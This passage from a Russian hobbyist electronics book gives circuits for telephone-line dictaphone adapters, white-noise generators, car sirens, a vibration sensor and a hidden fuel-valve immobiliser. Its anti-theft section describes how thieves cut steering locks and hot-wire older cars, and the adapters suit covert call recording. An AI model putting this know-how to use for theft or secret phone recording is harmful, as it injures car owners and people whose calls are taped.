При подключении устройства к линии необходимо соблюдать полярность питания. В устройстве можно использовать любой силовой трансформатор, понижающий напряжение до 12 В и рассчитанный на ток нагрузки более 0,1 А или готовый сетевой адаптер с теми же параметрами. Реле РЭС22 можно заменить на два реле типа РЭС9
Адаптер для диктофона
В настоящее время для записи звуковой информации широкое распространение получили импортные диктофоны со встроенной системой VОX, т.е. с системой управления голосом. Это позволяет более экономно расходовать пленку, т.к. при отсутствии сигнала двигатель диктофона выключен и потребление тока устройством минимально. Ниже приведены две схемы адаптеров для работы с диктофонами. Первая схема приведена на рис. 3.27.
Эта схема предельно проста, т. к. содержит всего одну деталь - трансформатор Т1, включаемый в разрыв линии. Трансформатор Т1 самодельный. Для его изготовления используется обмотка реле РЭС15 или РЭС49. Штатная обмотка реле выполняет роль II - обмотки трансформатора. Поверх нее намотана I - обмотка, которая содержит 400-500 витков провода ПЭВ 0,1. Витки обмотки скреплены клеем "Момент".
Адаптер подключается в разрыв любого из проводов линии без соблюдения полярности.
Вторая схема (рис. 3.28), в отличие от первой, не имеет трансформатора, что облегчает ее изготовление.
Ток, протекающий в линии при разговоре, проходит через резистор R1, вызывая на нем падение напряжения. Напряжение звуковой частоты проходит через конденсатор С1 и поступает на вход VОX диктофона. Для уменьшения высокочастотных наводок линии можно подключить конденсатор С2, обозначенный на схеме пунктирной линией.
3.4.3. Генераторы акустического шума
Акустические генераторы шума используются для зашумления акустического диапазона в помещениях и в линиях связи, а также для оценки акустических свойств помещений.
Под "шумом" в узком смысле этого слова часто понимают так называемый белый шум, характеризующийся тем, что его амплитудный спектр распределен по нормальному закону, а спектральная плотность мощности постоянна для всех частот.
В более широком смысле под шумом, по ассоциации с акустикой. понимают помехи, представляющие собой смесь случайных и кратковременных периодических процессов. Кроме белого шума выделяют такие разновидности шума, как фликкер-шум и импульсный шум. В генераторах шума используется белый шум, так как даже современны ми способами обработки сигналов этот шум плохо отфильтровывает ся. Ниже приводятся несколько схем различных генераторов шума.
Генератор белого шума
Самым простым методом получения белого шума является использование шумящих электронных элементов (ламп, транзисторов, различных диодов) с усилением напряжения шума. Принципиальная схема несложного генератора шума приведена на рис. 3.29.
Источником шума является полупроводниковый диод - стабилитрон VD1 типа КС168, работающий в режиме лавинного пробоя при очень малом токе. Сила тока через стабилитрон VD1 составляет всего лишь около 100 мкА. Шум, как полезный сигнал, снимается с катода стабилитрона VD1 и через конденсатор С1 поступает на инвертирую щий вход операционного усилителя DA1 типа КР140УД1208. На не инвертирующий вход этого усилителя поступает напряжение смещения, равное половине напряжения питания с делителя напряжения выполненного на резисторах R2 и R3. Режим работы микросхемы определяется резистором R5, а коэффициент усиления - резистором R4. С нагрузки усилителя, переменного резистора R6 , усиленное напряжение шума поступает на усилитель мощности, выполненный на микросхеме DA2 типа К174ХА10. Работа этого усилителя подробно описана в главе 2. С выхода усилителя шумовой сигнал через конденсатор С4 поступает на малогабаритный широкополосный громкоговоритель В1. Уровень шума регулируется резистором R6.
Стабилитрон VD1 генерирует шум в широком диапазоне частот от единиц герц до десятков мегагерц. Однако на практике он ограничен АЧХ усилителя и громкоговорителя. Стабилитрон VD1 подбирается по максимальному уровню шума, так как стабилитроны представляют собой некалиброванный источник шума. Он может быть любым с напряжением стабилизации менее напряжения питания.
Микросхему DA1 можно заменить на КР1407УД2 или любой операционный усилитель с высокой граничной частотой коэффициента единичного усиления. Вместо усилителя на DA2 можно использовать любой УЗЧ.
Для получения калиброванного по уровню шума генератора используют специальные шумящие вакуумные диоды. Спектральная плотность мощности генерируемого шума пропорциональна анодному току диода. Широкое распространение получили шумовые диоды двух типов 2ДЗБ и 2Д2С. Первый генерирует шума полосе до 30 МГц, а второй - до 600 МГц. Принципиальная схема генератора шума на шумящих вакуумных диодах приведена на рис. 3.30.
Резистор R1 типа МЛТ-0,25. Резистор R2 проволочный, он используется совместно с диодом 2ДЗБ. Питание генератора осуществляется от специального блока, схема которого приведена на рис. 3.31.
Цифровой генератор шума
Цифровой шум представляет собой временной случайный процесс, близкий по своим свойствам к процессу физических шумов и называется поэтому псевдослучайным процессом. Цифровая последовательность двоичных символов в цифровых генераторах шума называется псевдослучайной последовательностью, представляющей собой последовательность прямоугольных импульсов псевдослучайной длительности с псевдослучайными интервалами между ними. Период повторения всей последовательности значительно превышает наибольший интервал между импульсами. Наиболее часто применяются последовательности максимальной длины - М-последовательности, которые формируются при помощи регистров сдвига и сумматоров по модулю 2, использующихся для получения сигнала обратной связи.
Принципиальная схема генератора шума с равномерной спектральной плотностью в рабочем диапазоне частот приведена на рис. 3.32.
Этот генератор шума содержит последовательный восьмиразрядный регистр сдвига, выполненный на микросхеме К561ИР2, сумматор по модулю 2 (DD2.1), тактовый генератор (DD2.3, DD2.4) и цепь запуска (DD2.2), выполненные на микросхеме К561ЛП2.
Тактовый генератор выполнен на элементах DD2.3 и DD2.4 по схеме мультивибратора. С выхода генератора последовательность прямоугольных импульсов с частотой следования около 100 кГц поступает на входы "С" регистров сдвига DD1.1 и DD1.2, образующих 8-разpядный pегистpа сдвига. Запись инфоpмации в pегистpа пpоисходит по входам "D". На вход "D" pегистpа DD1.1 сигнал поступает с элементa обратной связи сумматора по модулю 2 - DD2.1. При вккочении питания возможно состояние регистров, когда на всех выходах присутствуют низкие уровни. Так как в регистрах М-последовательности запрещено появление нулевой комбинации, то в схему введена цепь запуска генератора, выполненная на элементе DD2.2. При включении питания последний формирует на своем выходе уровень логической единицы, который выводит регистр из нулевого состояния. На дальнейшую работу генератора цепь запуска не оказывает никакого влияния. Сформированный псевдослучайный сигнал снимается с 8-го разряда регистра сдвига и поступает для дальнейшего усиления и излучения. Напряжение источника питания может быть от 3 до 15 В.
В устройстве использованы КМОП микросхемы серии 561, их можно заменить на микротомы серий К564, К1561 или К176. В последнем случае напряжение питания должно быть 9 В.
Правильно собранный генератор в налаживании не нуждается. Изменением тактовой частоты можно регулировать диапазон частот шума и интервал между спектральными составляющими для заданной неравномерности спектра.
Охранные устройства
В разделе приводится описание ряда электронных устройств, которые могут использоваться совместно с любой промышленной или самостоятельно изготовленной системой охраны. Они предназначены для тех, кто хочет обеспечить надежную защиту своего имущества: автомобиля, квартиры и т.п.
Рост преступности и ограниченные возможности правоохранительных органов заставляют граждан самих заботиться о сохранности своей собственности и личной безопасности. .
Первая статья адресована автолюбителям, которые хотят установить одну из серийных сигнализаций. В ней приводятся практические рекомендации по выбору и простой способ повышения противоугонных свойств, применимый для любой системы охраны.
Эффективная противоугонная система для автомобиля
Многие автолюбители рано или поздно сталкиваются с проблемой защиты своего автомобиля от угона. Путей решения этой проблемы есть несколько:
использование механических противоугонных устройств;
установка электронных систем охраны;
применение электронных секреток и блокирующих узлов;
комплексная защита автомобиля, состоящая из комбинации выше перечисленных вариантов.
Рассмотрим более подробно перечисленные способы. Ведь чтобы грамотно защитить свой автомобиль, владелец должен знать не хуже угонщика, как его могут угнать и что необходимо именно для вашей марки. Иначе не спасет даже самая дорогая система охраны.
Механические устройства можно разделить в основном на два вида. Первый из которых это всевозможные блокираторы руля или
типа руль-педаль. Второй тип это замки на коробку переключения передач (КПП) и капот.
Что касается первого типа механических "противоугонных устройств", то они, несмотря на разрекламированность, привлекательный внешний вид и удобство эксплуатации, не выдерживают никакой критики с точки зрения выполнения своей основной задачи — защиты автомобиля от угона. Депо в том, что их довольно легко нейтрализовать.
Так, устройства отечественного производства традиционно изготавливаются из низкосортных сталей и их можно перепилить обычной ножовкой по металлу. Эта же задача решается и без физических усилий — ведь почти в любом фирменном магазине электроинструментов можно приобрести компактное устройство с автономным питанием под названием "арматурорез". Эти электрические кусачки помещаются в кармане куртки и способны за 10 секунд перекусить арматуру толщиной 10 мм (а сталь там не плохая). Заряда же встроенного аккумулятора достаточно для перекусывания чуть ли не полсотни подобных прутков.
Если же механическое блокирующее устройство изготовлено из хороших материалов, то угонщик может воспользоваться таким средством как жидкий азот. Это позволяет заморозить металл до такой степени, что он становится хрупким и раскапывается от удара молотком. Отметим также, что малообеспеченный вор (не имеющий хорошего инструмента) может просто перепилить руль, что довольно просто, а потом заменить его на новый.
Что же касается противоугонных устройств типа замков на КПП (MULT-L-LOCK) или на капот (HOOD-LOCK), то они тоже не лишены недостатков, хотя и выполняются из хороших материалов и имеют сложные замки. Одним из недостатков этих устройств является их относительно высокая цена. К примеру, MULT-L-LOCK с установкой стоит около $150, a HOOD-LOCK порядка $80. Не подвергая сомнению прочность и качество самих устройств, следует обратить внимание на то, что прочность элементов корпуса автомобиля, к которым крепятся эти устройства, вовсе не так высока как хотелось бы.
Что же можно сказать о таких средствах защиты автомобиля как серийные промышленные электронные противоугонные устройства? В установочных центрах и в розничной продаже их ассортимент достаточно большой, но несмотря на это изобилие, все их можно условно разделить на две категории. Это относительно недорогие и несложные устройства ценой до $100 и дорогие противоугонные системы известных в мире производителей ценой от $300. В промежутке между ними в основном стоят устройства с сервисными возможностями последних и противоугонными свойствами первых.
Что касается дорогих электронных систем, таких как CLIFFORD, BOCSH, BLACK BUG и др., то можно успокоить автомобилистов, желающих сэкономить на их установке. Установить противоугонную систему такого класса самостоятельно часто не представляется возможным, так как для этого нужно иметь специальные знания и, что самое главное, подробную инструкцию по установке, чего вы точно не получите. Например, в системе BLACK BUG в узлы, обеспечивающие блокировку, встраиваются специальные датчики с исполнительными устройствами, управление которыми выполняет центральный блок по штатной проводке автомобиля с помощью кодов, передаваемых на высокой частоте.
Если же вы решитесь установить сложные системы охраны в специализированном центре, что само по себе не дешево, то рискуете на весь срок эксплуатации автомобиля быть зависимым от тех, кто занимался установкой (хорошо, если еще и качественно), так как отремонтировать ее или хотя бы отключить в критической ситуации не всегда удастся.
Хочу особо обратить внимание тех автовладельцев, у кого в машине нет бортовой электроники, такой как электронный коммутатор, инжектор или хотя бы клапан ЭПХХ. Таких автомобилей пока все еще большинство, даже среди тех, что еще выпускаются промышленностью. В этом случае устанавливать на ваш автомобиль дорогостоящую противоугонную систему вообще не имеет смысла, так как деньги будут потрачены зря. Дело в том, что она просто не сможет реализовать своих потенциально больших противоугонных свойств. Вы в этом сможете сами убедиться, открыв капот. Из жизненно важных узлов автомобиля, необходимых для пуска двигателя и движения, вы можете заблокировать лишь стартер и катушку зажигания. Зная принцип работы двигателя, угнать такой автомобиль проще простого. Для этого даже не потребуется разбираться в хитросплетении ваших проводов. Угонщик сделает всего два прямых соединения: между клеммой "+" аккумулятора — катушкой зажигания и стартером.
Конечно, чтобы заглянуть под капот, потребуется сначала открыть двери, а при этом сработает сигнализация. Как легко открыть двери при помощи ..., знают многие (не буду описывать процесс угона более подробно, чтобы меня не обвинили в обучении этому делу).
Несмотря на то, что автомобиль начнет пищать на все лады и мигать всеми осветительными приборами и может даже послать вам сообщение на пейджер (некоторые противоугонные устройства это обеспечивают), взывая о помощи, все равно капот будет открыт. В этом случае отключить сирену не составит труда.
Все указанные выше операции делаются довольно быстро и со стороны будет очень похоже на то, что хозяин, забыв что сигнализация включена, полез в собственный автомобиль. Ну а дальше, как уже отмечалось — два соединения и вы теряете автомобиль.
По данным испытаний, проводимых одним из подразделений МВД среди отбывающих в тюрьме срок специалистов, опытному угонщику достаточно всего 20...30 с, чтобы завести отечественный автомобиль, даже не зная, какая система сигнализации там установлена.
Есть противоугонные системы, оборудованные радиомаяком, при помощи которого автомобиль после угона обнаруживается и задерживается службой ГИБДД. Данные системы возврата угнанного автомобиля при хорошо отлаженной системе с успехом используются на Западе. Статистика же применения таких устройств у нас в стране просто печальна — либо отказывает техника, либо же угнанную машину просто не хотят задерживать от греха подальше. По этой причине не только рассматривать более подробно, но даже называть такие системы нет никакого смысла.
Учитывая все выше сказанное, а также практику установки и эксплуатации охранной сигнализации, можно предложить следующее техническое решение для защиты вашего автомобиля от угона. Оно заключается в использовании комбинации устройств промышленного изготовления, с уникальным самодельным.
Как уже упоминалось, есть электронные противоугонные системы и подешевле, и, по моему мнению, более практичные. К ним можно отнести такие как RED SCORPIO, PRESTIGE, ALLIGATOR и др.. Все они в зависимости от комплектации и уровня сервиса стоят $50...100. Эти несложные устройства вы вполне сможете установить сами.
В качестве противоугонных средств в них обычно предлагается две цепи блокировки, т.е. можно заблокировать стартер и катушку зажигания, что, как отмечалось выше, хотя и малоэффективно, но все же время у угонщика отнимет.
Приобретя и установив относительно недорогую систему охраны, вы получите уровень сервиса, достаточный для отечественного автомобиля, и первый рубеж охраны. Существенно улучшить охрану можно при помощи установки несложного устройства — топливного клапана. Электрический бензоклапан — это электромагнит, который обеспечивает прохождение бензина от бензобака к двигателю только при подаче на него питающего напряжения (существуют также нормально открытые клапаны с закрыванием подачей напряжения, но их мы рассматривать не будем).
В принципе ничего нового в этом устройстве нет — оно серийно выпускается отечественной промышленностью под разными названиями, например "Сюрприз" (рис. 3.1) и представляет собой встраиваемый в разрыв цепи бензопровода блок (крепится к корпусу автомобиля). Его можно установить в труднодоступном и только вам известном месте. Но для включения бензоклапана в его комплект входит тумблер. Мало того, что при установке не хотелось бы портить сверлением какую-нибудь деталь кузова, но ведь и установить его нужно незаметно. Кроме того, место установки должно быть таким, чтобы вы могли включать и выключать тумблер незаметным движением. Ведь даже обычный дворовый хулиган, наблюдающий, как вы при запуске двигателя куда то лезете, способен определить место установки тумблера. А мест для его скрытого размещения довольно мало.
Решением этой проблемы может служить самодельное устройство, выделенное на рис. 3.2 пунктиром. Оно представляет собой токовое герконовое реле К1, обеспечивающее режим самоподхвата. Токовое репе не следует путать с обычными реле, которые выпускает промышленность — такое купить готовое вам не удастся.
Реле К1 включается вместо тумблера в цепь подачи питания на обмотку бензоклапана К2 и работает следующим образом.'При включении зажигания контакты геркона разомкнуты и клапан обесточен, соответственно будет перекрыт бензопровод. Чтобы включить контакты геркона К1.1, необходимо к ним поднести небольшой магнит.
Устройство срабатывает при приближении магнита на расстояние 10...20 мм (зависит от силы магнита). В этом случае в цепи обмотки К1 от "+" аккумулятора начнет протекать ток через обмотку К2. Данный электроклапан при напряжении 13 В потребляет ток около 0,3 А.
Обмотка К1 конструктивно расположена на корпусе геркона и ее параметры выбраны таким образом чтобы электромагнитное поле, возникающее от проходящего через обмотку тока, смогло поддерживать контакты К1.1 во включенном состоянии и после убирания магнита. Таким образом, устройство зафиксируется в этом состоянии.
Выключается же реле К1 и клапан К2 после обесточивания цепи при помощи выключения замка зажигания. Что удобно, так как позволит не забыть выключить бензоклапан при постановке машины на охрану.
Конструктивное исполнение токового реле К1 показано на рис. 3.3. Оно изготавливается следующим образом. У обычного геркона типа КЭМ-1 (с одной группой нормально разомкнутых контактов) укорачивается до 5 мм один из выводов. В последующем туда будет подпаиваться конец обмотки. Затем геркон оборачивается в 2 слоя стеклотканью. Причем, под последний слой подкладывается толстый медный провод (диаметром 0,5...1 мм), который
будет служить вторым выводом реле при подпайке конца обмотки. Конец провода должен выступать за край корпуса геркона примерно на 15 мм.
Подпаяв к укороченному концу геркона провод, производим намотку катушки. Обмотка содержит около 400 витков, намотанных проводом ПЭТВ или ПЭВ-2 диаметром 0,25 мм. Намотка осуществляется виток к витку на всю длину корпуса в два слоя — это примерно 45 мм. Таким образом, оба вывода обмотки К1 будут находиться с одной стороны геркона, как это показано на рисунке. После окончания намотки обмотку необходимо пропитать лаком или клеем "Момент". На обмотку можно также одеть термоусаживающуюся трубку. В результате получится прочный цилиндр диаметром 10...11 мм с выходящими по краям проводами.
Теперь необходимо произвести определение правильной фазировки подключения обмотки токового реле. Для этого, до того как вы установите устройство в автомобиль, соберите схему подключения, показанную на рис. 3.2 и поднесите к геркону магнит. Если он уверенно сработает, то фазировка правильная. А если вы услышите характерное дребезжание контактов, то нужно поменять местами провода, подключаемые к геркону (правильную полярность следует запомнить).
Токовое реле К1 можно положить под ковриком обшивки в месте, исключающем механическую нагрузку. Для удобства крепления геркона в любом другом месте и увеличения механической прочности всей конструкции можно изготовить пластину, показанную на рис. 3.4. Она выполняется из одностороннего фольгированного стеклотекстолита толщиной 1.5...3 мм. К оставленным участкам фольги припаиваются выводы геркона и внешние подходящие провода. Сама же плата крепится к корпусу автомобиля винтом-саморезом через крепежное отверстие или клеем.
Данная конструкция реле устойчиво работает при минимальном токе в цепи 200 мА и падении напряжения на обмотке меньше 1 В. Максимальный ток через обмотку К1 может быть до 0,5 А. При необходимости работы на большем токе, например, если применяемый бензоклапан потребляет больше чем указано, обмотку потребуется выполнять более толстым проводом (число витков при этом уменьшится). Контакты геркона КЭМ-1 рассчитаны на коммутацию тока до 2 А. Другие типы герконов применять нельзя, так как они требуют большего магнитного поля для удержания контактов или же не допускают протекания через контакты тока более 250 мА.
Магнит можно оформить в виде брелка к ключам (лучше использовать магниты, изготовленные на основе самарий-кобальтового материала — они при малых габаритах имеют сильное магнитное поле).
Эксплуатация секретного магнитного включателя К1 будет более удобной, если схему дополнить цепью с лампой индикации, показанной на рис. 3.2 пунктиром. Лампочка EL1 начнет светиться в случае включения бензоклапана и вы будете уверены в том, что на него подано напряжение. Лампу удобно использовать одну из уже имеющихся на панели приборов. Вместо лампы можно применить также любой светодиод с последовательно включенным резистором сопротивлением 1.2...3 кОм, ограничивающим ток.
Таким образом, угонщик, даже нейтрализовав вашу противоугонную систему, будет весьма озадачен тем, что автомобиль, проехав 100...500 м (за счет остатка бензина в трубопроводе), неожиданно заглох и вообще не заводится. Конечно, многие из них догадаются о бензоклапане и поэтому начнут искать тумблер включения, которого в данной ситуации вообще нет. Перспектива же поиска неизвестно где установленного бензоклапана, а потом напрямую соединять бензопровод при дефиците времени может побудить отказаться от угона автомобиля.
Правильно изготовленное и грамотно установленное предлагаемое устройство совместно с электронной сигнализацией может стать серьезным препятствием для угонщиков. Если же установить еще и механический блокиратор руля, то в итоге у вас получится комплексная защита автомобиля от угона, что в данной конфигурации:
недорогая электронная система, бензоклапан и блокиратор — на мой взгляд, является наиболее рациональной и экономичной.
Карманный звуковой сигнализатор
Это устройство отличается своей простотой и малыми габаритами. Оно издает довольно неприятный звук и может использоваться как индивидуальное средство подачи сигнала тревоги, чтобы привлечь внимание окружающих или же применяться в составе любой системы охранной сигнализации.
При изготовлении сирены использована широко распространенная микросхема звукового усилителя К174УН14 (TDA2003), которая включена в режиме автогенератора, рис. 3.5. На ее выходе будут прямоугольные импульсы. При этом частота звука определяется емкостью конденсатора С2 и в небольших пределах может меняться подстроенным резистором R2.
В схеме генератора используется особенность внутренней структуры микросхемы. Внутри корпуса уже имеется резистор отрицательной обратной связи между выходом (вывод 4) и входом (2), а положительная обратная связь на вход DA1/1 поступает с делителя, состоящего из резисторов R1-R2.
Рабочая частота автогенератора настраивается на максимальную громкость звука. Частота в этом случае будет совпадать с резонансной для пьезоизлучателя (обычно это около 2...4 кГц — зависит от типа используемого звукового излучателя).
Для того чтобы схема меньше потребляла энергии, в качестве звукового сигнализатора применяется пьезоизлучатель СП-1 (в крайнем случае подойдут два пьезоизлучателя ЗП-1).
Для получения максимальной отдачи от пьезоизлучателя (В1) на него требуется подать повышенное переменное напряжение (с амплитудой не менее 25 В). Это достигается при помощи включения В1 через автотрансформатор Т1.
Автотрансформатор можно изготовить самостоятельно на основе железа от выходного или согласующего трансформатора, применяемого в малогабаритных радиоприемниках. Имеющиеся в них обмотки удаляем, а на их место наматываем 100+800 витков проводом ПЭВ диаметром 0,1 мм.
В качестве Т1 удобно использовать также трансформатор от старых моделей телефонных аппаратов. Потребуется только удалить верхнюю обмотку и вместо нее намотать 100...150 витков таким же проводом. Число витков в обмотке (2-3) зависит от напряжения питания схемы и берется максимальным при Uпит=9...12 В.
Если предполагается работа автогенератора в долговременном режиме — микросхема DA1 крепится к теппоотводу.
Цепь из элементов R3-C4 предотвращает возбуждение автогенератора на более высоких частотах.
Схема автогенератора сохраняет работоспособность при изменении питающего напряжения от 2,7 до 15В. Потребляемый ток составляет при 3 В — 30 мА, 10В — 200 мА. В автономном варианте в качестве элементов питания могут использоваться три или четыре аккумулятора Д-0.26Д.
Схема не критична к точности номиналов и типам используемых радиодеталей. Единственное требование к ним — малые габариты, например подстроечный резистор R2 типа СПЗ-19а.
Все детали схемы, кроме трансформатора Т1, размещаются на односторонней печатной плате размером 35х25 мм, рис. 3.6.
Звуковой сигнализатор с меняющейся частотой звука
На основе интегральной микросхемы звукового усилителя К174УН14 (TDA2003) можно выполнить звуковой сигнализатор с изменяемой частотой звука, рис. 3.7. Сам звуковой генератор (DA1) собран по схеме, описанной в предыдущей статье. Единственное отличие заключается в использовании дополнительного транзистора VT1 и двух низкочастотных генераторов, собранных на логических элементах КМОП микросхемы DD1.
Генератор, выполненный на элементах DD1.3, DD1.5, работает на частоте 0.7...1 Гц. Сигнал с выхода DD1.6 поступает через резисторы R6-R7 на управление транзистором VT1, что обеспечивает изменение частоты звука. Частота на выходе DA1/4 генератора будет циклически меняться в зависимости от изменения сопротивления эмиттер-коллектор транзистора VT1. При этом в зависимости от положения переключателя SA1 сигнализатор может работать в одном из трех режимов:
1) непрерывный сигнал одной частоты;
2) сигнал с изменяемой частотой, при этом будут чередоваться интервалы звучания сирены и однотонного звука;
3) сигнал с изменяемой частотой.
Генератор на элементах DD1.1-DD1.2 управляет работой второго генератора (DD1.3, DD1.5). Когда на выводе DD1/6 присутствует уровень лог. "1" (он через диод VD1 поступает на DD1/13) — второй генератор перестает работать и на выходе будет однотонный звук.
Настройка схемы заключается в установке резисторами R8 и R6 необходимого диапазона перестройки частоты, а также частоты, с которой будет чередоваться смена звука, что зависит от номиналов элементов R3 и С1.
Все элементы, выделенные на схеме пунктиром, размещены на односторонней печатной плате размером 57,5х40 мм, рис. 3.8.
Устройство не критично к типам применяемых деталей и точности соответствия номиналов. Подстроенные резисторы (R6 и R8) использованы малогабаритные: типа СПЗ-19а.
В качестве звукового излучателя (ВА1) может быть применен пьезосигнализатор ОСА-110. Он имеет габариты 70х70х35 мм и обеспечивает параметры:
громкость звука на расстоянии 1 м не менее 110дБ;
резонансную частоту 2,2±0,5 кГц;
подводимую амплитуду сигнала до 200 В;
диапазон рабочих температур-45...+55°С.
Для работы пьезоизлучатепя с максимальной громкостью его питание выполняется через повышающий напряжение автотрансформатор Т1. Для изготовления Т1 удобно использовать магнитопровод трансформатора от старых моделей телефонных аппаратов. Потребуется удалить все обмотки и намотать 1600+80 витков проводом ПЭЛ диаметром 0,12 мм (последние 80 витков выполняются проводом диаметром 0,25 мм).
К выходу генератора может подключаться также и обычный электромагнитный динамик мощностью около 5 Вт и сопротивлением 4 Ом. В этом случае автотрансформатор Т1 не нужен.
Устройство работает при питании от источника напряжением от 3 до 15 В. При напряжении 12 В потребляемый ток составляет не более 0,3 А.
Мощная сирена
Для звукового оповещения это устройство может применяться в составе любой стационарной или автономной охранной сигнализации. Оно создает плавно меняющийся по частоте звук, похожий на сигнал милицейской сирены. При этом в качестве звукового излучателя может подключаться одновременно (параллельно) много динамиков, но даже при использовании всего одного мощность звукового сигнала будет значительно превосходить пьезосигнализаторы и автомобильные пищалки. Кроме того, сигнал имеет индивидуальный "звуковой рисунок", что позволяет его легко отличить от других.
Схема устройства, рис. 3.9, состоит из двух связанных генераторов, выполненных на микросхеме DD1, и делителя частоты на DD2.1. Частота звукового генератора на элементах DD1.4, DD1.6 циклически меняется полевым транзистором VT1. Так как полевой транзистор изменяет свое сопротивление исток-сток в зависимости от управляющего напряжения на затворе. Управляющее пилообразное напряжение образуется на конденсаторе С2 при помощи второго, более низкочастотного генератора, выполненного на элементах DD1.1-DD1.2, в результате заряда конденсатора С2 через резистор R3 и разряда через R3 и R4 (когда на выводе DD1/6 лог. "0").
На выходе DD1/8 генератора форма импульсов отличается от меандра. Триггер DD2.1 работает в режиме делителя на 2 и обеспечивает на своих выходах симметричные импульсы (пауза равна длительности). Это позволяет исключить подмагничивание обмотки звукового излучателя (динамика) постоянной составляющей протекающего тока, как это бывает в некоторых схемах.
Элемент триггера DD2.2 является повторителем сигналов, которые через резисторы R6 и R7 поступают на управление мостовым коммутатором. Использование мостовой схемы включения динамика (ВА1) позволяет увеличить амплитуду выходного сигнала до уровня, близкого к питающему напряжению (выходная мощность в этом случае также увеличивается). Достигается это тем, что в открытом состоянии могут находиться одновременно только два транзистора (VT2, VT5 или VT3, VT6) — зависит от уровней на выходах DD2.2 (направление протекающего тока через обмотку динамика ВА1 периодически меняется).
В схеме применены конденсаторы С1...СЗ типа К10-17, С4 — типа К52-1 Б на 63 В. Резисторы подойдут любого типа. При использовании только одного динамика транзисторы КТ827 и КТ825 можно заменить на менее мощные КТ972 и КТ973 соответственно. Их нужно устанавливать на радиатор. Динамик ВА1 подойдет мощностью не меньше 20 Вт при сопротивлении обмотки 4 Ом или 10 Вт при 8 Ом.
Все элементы схемы, кроме транзисторов VT2...VT5 и включателя SA1, расположены на односторонней печатной плате размера-
ми 55х35 мм, рис. 3.10. Для упрощения топологии плата содержит одну объемную перемычку.
При настройке устройства, из-за разброса параметров полевых транзисторов КП31 ЗА, для получения нужной тональности звучания, номинал конденсатора СЗ необходимо подбирать из диапазона 0,015...0,47 мкФ.
Сирена сохраняет работоспособность при изменении питающего напряжения от 6 до 15 В, а потребляемый ток (1...2.5 А) зависит от сопротивления обмотки подключенного динамика и их количества параллельно соединенных.
Выходной каскад сирены вместо четырех транзисторных коммутаторов можно выполнить также на интегральной микросхеме сдвоенного звукового усилителя (TDA2005), как это показано на рис. 3.11. Микросхема применена в режиме мостового включения нагрузки, что позволяет обойтись без переходных конденсаторов в цепи динамика и увеличить максимальную амплитуду напряжения на нагрузке почти до уровня питающего напряжения. Усилитель может работать при изменении питающего напряжения от 6 до 16 В.
Применение интегральной микросхемы позволит уменьшить габариты всего устройства, так как в качестве теплоотвода для TDA2005 может использоваться металлический корпус конструкции.
Сопротивление подключенной нагрузки (ВА1) должно быть не меньше 4 Ом. В этом случае максимальная мощность при питающем напряжении 12 В составит около 20 Вт (при Рнагр=8 Ом — Рн=12 Вт). А потребляемый ток не превышает 1,8 А.
Датчики колебаний для охранной сигнализации
Кроме обычных контактных датчиков необходимым элементом для любой охранной сигнализации, устанавливаемой на автомобиле, является датчик колебаний. Он должен реагировать также на удары и любые вибрации корпуса. При этом необходимо обеспечить срабатывание, если амплитуда колебаний превысит заданную величину.
В простейших серийных промышленных системах охраны (среднего класса) чаще всего используют один из двух видов датчиков колебаний: выполненные на основе пьезоэффекта или электромагнитной индукции.
В литературе уже публиковались конструкции электромагнитных датчиков, выполненные на основе механизма стрелочного измерительного прибора — микроамперметра [Л20, стр. 86]. Предлагаемый
датчик имеет аналогичный принцип работы (магнитное попе наводит Э. Д. С. в катушке), но его конструкция является более стойкой к механическим перегрузкам, так как в этой колебательной системе катушка закреплена неподвижно, а перемещается только магнит. Вся конструкция позволяет уменьшить габариты датчика.
По сравнению с датчиками, выполненными на основе пьезоэлемента, на данное устройство меньше влияет изменение температуры и оно более чувствительно, особенно к медленным колебаниям корпуса автомобиля.
Датчиком вибрации (ударов) и колебаний является катушка L1 с закрепленным над ней магнитом, рис. 3.12. Магнит крепится клеем "Момент" к латунной пружинящей пластине. Все элементы крепления катушки, показанные на рисунке, использованы латунные (подойдет также любой другой не магнитный материал, например алюминий или пластмасса).
Катушка датчика намотана на пластмассовом каркасе, рис. 3.13, проводом ПЭЛ диаметром 0,08...0,1 мм (внавал до заполнения). Это примерно около 1800 витков (в моем варианте индуктивность получилась 3,3 мГн).
При колебаниях магнита в катушке наводится напряжение, которое усиливается операционным усилителем (DA1), рис. 3.14. Операционный усилитель работает без обратной связи — с максимальным коэффициентом усиления, т.е. как компаратор. В исходном состоянии на его выходе DA1/6 будет уровень лог. "0" (не более 0,5 В), а при колебаниях магнита появятся импульсы. Эти импульсы открывают транзистор VT1 и начнет моргать светодиод HL1. Транзистор VT2 должен быть постоянно открыт поданным на базу положительным напряжением в случае если сигнализация включена.
Стабилитрон VD1 предотвращает повреждение микросхемы повышенным напряжением, а диод VD2 предохраняет от неправильной полярности подачи питания на схему датчика.
Вся схема датчика за счет того, что в нем используется микромощная микросхема, потребляет от источника 12 В в режиме ожидания ток не более 0,1 мА, а при свечении светодиода до 6 мА.
Чувствительность датчика зависит от гибкости пластины, на которой крепится магнит, и может быть довольно высокой. И чтобы ее снизить до нужного уровня, служит регулировочный резистор R2, который позволяет менять порог срабатывания компаратора DA1. Это удобно при неблагоприятных погодных условиях. Например, во время дождя или сильного ветра, когда чувствительность следует уменьшить, чтобы исключить ложные срабатывания. А для удобства настройки чувствительности датчика служит светодиод HL1. Момент срабатывания контролируется по его свечению.
Если датчик будет установлен в самом блоке охраны, то сигнал с коллектора VT1 может сразу подключаться к сигнализации.
При установке устройства в автомобиле следует учитывать, что от места установки, а также плоскости колебаний магнита, зависит чувствительность датчика. Поэтому конструктивно датчик удобнее выполнять в виде отдельного блока, который подключается к сигнализации тремя проводами. Аналогично делают в промышленных системах охраны, например в системе "Red Scorpio-600" третий провод применяется для электронного управления включением датчика (в случае, если вы его не будете использовать, то вместо транзистора VT2 на плате устанавливается перемычка эмиттер-коллектор).
В схеме применены детали: подстроенный резистор R2 типа СП4-9 на 0,5 Вт (СПЗ-166), остальные МЛТ мощностью 0.125 Вт. Транзисторы могут быть с любой последней буквой в обозначении и они заменимы на любые аналогичные с соответствующей проводимостью.
Конденсаторы С1, СЗ из серии К10 (К10-17), оксидный С2 — К50-35 на 25 В. Светодиод HL1 может применяться любого типа.
Для удобства подключения внешних проводов к датчику на плате установлена трехсекционная коммутационная колодка с винтовыми зажимами — она впаивается в плату.
Все детали схемы размещены на односторонней печатной плате из стеклотекстолита, рис. 3.15. Для увеличения плотности монтажа
часть резисторов устанавливается вертикально, а стабилитрон VD1 используется в пластмассовом корпусе.
В качестве корпуса удалось найти подходящую пластмассовую коробку, рис. 3.16 (под нее и выполнена плата).
